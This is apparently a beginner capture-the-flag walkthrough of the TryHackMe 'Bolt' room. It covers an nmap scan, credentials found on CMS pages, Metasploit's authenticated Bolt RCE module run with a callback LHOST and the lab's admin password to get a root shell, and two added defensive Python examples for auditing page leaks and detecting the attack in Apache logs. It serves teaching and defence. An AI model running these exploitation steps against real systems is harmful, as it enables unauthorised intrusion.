This is a CMS-based machine with a Remote Code Execution vulnerability, and it's a beginner-friendly box. Come on, let's do this together.
First things first: find the room on TryHackMe named Bolt - A hero unleashed.
Connect to the TryHackMe VPN using your configuration file (<username>.ovpn); here is the reference command in case you need it.
Also, deploy the machine from task 1 of the room and note its IP address.
Run an Nmap scan against <ip> to find which ports are open:
root@root:# nmap -A <ip>
OK, so three ports are open:
22 (SSH, OpenSSH) | 80 (HTTP, Apache) | 8000 (HTTP, PHP 7.2.32-1)
Since port 80 is open, I tried opening it in the web browser: <ip>:80
Ahhh... nothing interesting, just the default page of the Ubuntu Apache2 server.
Port 8000 also runs an HTTP service, so I tried <ip>:8000
And got this Bolt CMS page.
Aha! A blue screen, but not the Blue Screen of Death (BSOD); this one is a hit.
OK, it's time to wander around the site (do it yourself).
While wandering, you will come across these two pages.
One has a note by the admin saying here is the password in case you need help; they forgot to remove it before going to production.
The second page contains the username for it. How lucky I am.
Meanwhile, we have two of the task answers as well.
These two pages give us the username and password.
We now have the answer, but where is the question (the login page)?
To find the question for my answers (sarcastic), we need to Google the location of the default login page in Bolt CMS, and I ended up at this documentation manual on their official site.
According to the documentation, the login page is at www.yourdomain.com/bolt/login
So put that into our room's URL, <ip>:8000/bolt/login, and we get this login page.
Now, more information gathering:
OK, admin dashboard, lovely!
Wait! What's that in the bottom left corner? Hello, little version number of Bolt CMS (Bolt 3.7.1).
Now we need to exploit this. To do so we need an exploit, so search Google or any other exploit database for Bolt CMS 3.7.1, and we find this exploit for the older version 3.7.0.
Here we go with the next answer to the task. This is the exploit we are going to use, since it looks promising by name.
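Everything the walkthrough needed so far was handed over by the site itself: a note with a password left in a published page, a page naming the account, and a footer printing the exact CMS release. As an added defender-side example (not code from this write-up or from Bolt CMS), here is a small Python content audit that flags those three things in rendered page text. The sample pages and the credential values in them are constructed placeholders, and the regexes are heuristics I chose, not anything Bolt ships.

```python
"""Content audit for a CMS site: flags published text that leaks
credentials and pages that disclose the exact CMS version.

Added example, not code from the write-up or from Bolt CMS. The sample
pages below are constructed and the credential values are placeholders."""
import re
from html.parser import HTMLParser
from typing import Optional


class _TextExtractor(HTMLParser):
    """Collect the visible text of an HTML document (tags dropped)."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def handle_data(self, data):
        self.chunks.append(data)


def strip_tags(html: str) -> str:
    """Return the visible text with whitespace normalised to single spaces."""
    parser = _TextExtractor()
    parser.feed(html)
    return " ".join(" ".join(parser.chunks).split())


# Heuristic: "password is X", "password: X", "username - X" and similar.
CREDENTIAL_RE = re.compile(
    r"\b(password|passwd|username|user name|login)\b\s*(?:is|:|=|-)\s*([^\s.,;<]+)",
    re.IGNORECASE,
)

# Footer strings such as "Bolt 3.7.1" that tell every visitor the exact release.
VERSION_RE = re.compile(r"\bBolt\s+(\d+\.\d+(?:\.\d+)?)\b")


def find_credential_leaks(text: str) -> list:
    """Return each 'field=value' pair that looks like a leaked credential."""
    return [f"{m.group(1).lower()}={m.group(2)}" for m in CREDENTIAL_RE.finditer(text)]


def find_version_disclosure(text: str) -> Optional[str]:
    """Return the disclosed version string, or None if the page prints none."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def audit_pages(pages: dict) -> dict:
    """Audit {path: html}; return only the pages that have findings."""
    findings = {}
    for path, html in pages.items():
        text = strip_tags(html)
        page_findings = [f"credential leak: {leak}" for leak in find_credential_leaks(text)]
        version = find_version_disclosure(text)
        if version:
            page_findings.append(f"version disclosure: Bolt {version}")
        if page_findings:
            findings[path] = page_findings
    return findings


# Constructed sample pages mirroring the three weak spots in the write-up:
# a note left in production with a password, a page naming the account,
# a dashboard footer that prints the release, and one clean page.
SAMPLE_PAGES = {
    "/page/note-to-self": "<h1>Note</h1><p>Password is placeholder-pass-123 in case you "
                          "need help. Remove before going live!</p>",
    "/page/welcome": "<p>Welcome! Username: placeholder-user, have a nice day.</p>",
    "/bolt": "<div class='footer'>Bolt 3.7.1</div>",
    "/page/about": "<p>We make things. Contact us for details.</p>",
}

if __name__ == "__main__":
    for path, items in audit_pages(SAMPLE_PAGES).items():
        print(path)
        for item in items:
            print("  -", item)
```

In practice you would feed `audit_pages` the HTML pulled from your own site's sitemap or from the CMS database before each release; the version check is the reason most CMSes let you hide the footer banner on production installs.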
Now let's fire up Metasploit; it's time to attack:
Search for "bolt" to find the exploit:
msf6 > search "bolt"
The second exploit in the results is the one we are going to use:
msf6 > use exploit/unix/webapp/bolt_authenticated_rce
Now check the options:
Now set a few options for our exploit:
msf6 > set LHOST <your ip>
msf6 > set RHOST <room ip>
msf6 > set USERNAME bolt
msf6 > set PASSWORD boltadmin123
msf6 > run
(For <your ip>, use your tun0 address: run ifconfig tun0 on Linux.)
Voilà! We got the shell.
Booyah! We have root access, and now we need to crawl through the system to get the flag.
We land in /home/bolt/public/files; move to home.
List the files: there is the flag file.
Don't wait, just cat it...
because Bolt hates cats 😹.
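The shell above lands in public/files, the CMS's web-served upload directory, after an admin login with leaked credentials. As an added defender-side example (not code from this write-up or from Bolt CMS), here is a Python detector that runs over Apache access-log lines and raises on exactly that trail: a login to the admin panel from a client outside the administrator network, and the server handing out a script from under the upload directory, escalated when both come from the same client within an hour. Assumptions, labelled in the code: the login form is at /bolt/login as in the write-up, a successful login is answered with a 302 redirect, the public/files directory is served under /files/, and the log lines, IPs and admin network are all constructed.

```python
"""Detection over Apache access logs for the trail the write-up's attack
chain leaves: an admin-panel login from a source that is not an
administrator network, then the web server serving a script out of the
public upload directory.

Added example, not code from the write-up or from Bolt CMS. Assumptions:
the login form is at /bolt/login (as in the write-up), a successful login
answers with a 302 redirect, and the directory the shell landed in
(public/files) is served under /files/. Log lines, IPs and the admin
network are constructed."""
import re
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import Optional

# Apache combined log format, parsed up to the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ADMIN_NETS = [ip_network("10.10.0.0/16")]  # constructed: where admins should come from
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")
LOGIN_WINDOW_S = 3600  # correlate a served script with a login in the last hour


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; None for lines that do not fit the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def is_admin_login(rec: dict) -> bool:
    """POST to the admin login form answered with a redirect (assumed success)."""
    return (rec["method"] == "POST" and rec["path"].startswith("/bolt/login")
            and rec["status"] == 302)


def is_script_from_uploads(rec: dict) -> bool:
    """A script under the upload directory that the server actually answered (2xx)."""
    path = rec["path"].split("?", 1)[0].lower()
    return (path.startswith("/files/") and path.endswith(SCRIPT_EXT)
            and 200 <= rec["status"] < 300)


def from_admin_net(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in ADMIN_NETS)


def detect(lines) -> list:
    """Return alerts in log order; a served script shortly after an admin
    login from the same client is escalated to high severity."""
    alerts = []
    logins = defaultdict(list)  # client ip -> timestamps of admin logins
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        if is_admin_login(rec):
            logins[ip].append(rec["ts"])
            if not from_admin_net(ip):
                alerts.append({"severity": "medium", "ip": ip, "path": rec["path"],
                               "rule": "admin login from non-admin network"})
        elif is_script_from_uploads(rec):
            recent = any((rec["ts"] - t).total_seconds() <= LOGIN_WINDOW_S
                         for t in logins[ip])
            alerts.append({"severity": "high" if recent else "medium", "ip": ip,
                           "path": rec["path"],
                           "rule": "script served from upload directory"
                                   + (" after admin login" if recent else "")})
    return alerts


# Constructed log: an admin logging in from the admin network, an outside
# client logging in and then fetching a script from /files/, and a probe
# for a script that does not exist (404, so nothing was served).
SAMPLE_LOG = """\
10.10.5.20 - - [18/Feb/2024:10:01:02 +0000] "POST /bolt/login HTTP/1.1" 302 412 "-" "Mozilla/5.0"
10.10.5.20 - - [18/Feb/2024:10:01:03 +0000] "GET /bolt HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.0.2.77 - - [18/Feb/2024:10:15:44 +0000] "GET /page/about HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.77 - - [18/Feb/2024:10:16:01 +0000] "POST /bolt/login HTTP/1.1" 302 412 "-" "Mozilla/5.0"
192.0.2.77 - - [18/Feb/2024:10:16:20 +0000] "GET /files/photo.jpg HTTP/1.1" 200 55012 "-" "Mozilla/5.0"
192.0.2.77 - - [18/Feb/2024:10:16:33 +0000] "GET /files/upload.php?v=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Feb/2024:11:40:10 +0000] "GET /files/old.php HTTP/1.1" 404 196 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(f'{a["severity"]:6} {a["ip"]:14} {a["rule"]} ({a["path"]})')
```

The second rule is also the mitigation: an upload directory should never be allowed to execute scripts at all (a `php_admin_flag engine off` or equivalent for that location), so any 2xx on a script path there is a configuration failure worth an alert on its own, not only when it follows a suspicious login.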
And there you go: you have exploited the machine, got a flag and ...